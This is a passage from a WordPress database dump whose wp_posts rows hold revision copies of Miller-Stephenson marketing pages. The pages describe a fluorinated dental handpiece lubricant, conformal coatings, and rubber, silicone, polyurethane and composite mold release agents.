operation.\r\n\r\nIn contrary, <strong>FluoroExtreme™</strong>  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n<h3><strong>Product Description</strong></h3>\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (<a href="https://en.wikipedia.org/wiki/ISO_10993">ISO 10993</a>)</span></li>\r\n</ul>\r\n[ux_product_categories ids="12" number="10"]\r\n\r\n&nbsp;', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-11-24 03:10:49', '2016-11-24 03:10:49', '', 1128, 'https://www.miller-stephenson.com/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3119, 3, '2016-11-24 03:17:04', '2016-11-24 03:17:04', '<h3>Miller-Stephenson Conformal Coatings</h3>\r\nConformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are four general classes of conformal coating to choose from:\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\nOur entire line of conformal coatings can be found <a href="https://www.miller-stephenson.com/chemicals/conformal-coating/">here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-11-24 03:17:04', '2016-11-24 03:17:04', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3121, 3, '2016-11-24 04:09:57', '2016-11-24 04:09:57', '<h1 style="text-align: justify;"><strong>Pioneering Rubber Mold Release Agents &amp; Silicone Mold Release Agents</strong></h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements in today\'s toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>™, and our worldwide reputation for unsurpassed expertise, consistent quality, and value. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds. Our release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys™ Silicone Mold Release agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Minimal Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys™ mold release products, include <strong>solvent based</strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide For Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\n<table style="height: 1010px;" width="829">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instantaneous Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal Rejection Rate</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Release most compounds</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Multiple releases</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-Based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[ux_product_categories ids="21" number="10"]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-24 04:09:57', '2016-11-24 04:09:57', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3122, 3, '2016-11-24 04:11:59', '2016-11-24 04:11:59', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Polyurethane Mold Release Agents</h1>\r\n<span style="font-size: 105%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research, development and technical expertise.  Our mold release agents are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong><span style="font-size: 105%;">Application Guide for Polyurethane Mold Relea</span>se Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 105%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 105%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 105%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 105%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 105%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 105%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Rapid Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Satin</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Polyurethane Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-24 04:11:59', '2016-11-24 04:11:59', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3123, 3, '2016-11-24 04:14:26', '2016-11-24 04:14:26', '<h1>Composite Mold Release Agents - ReleaSys™</h1>\r\nMiller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield unmatched utility and efficient for the robust and constantly evolving composite industry. These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistance, and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents 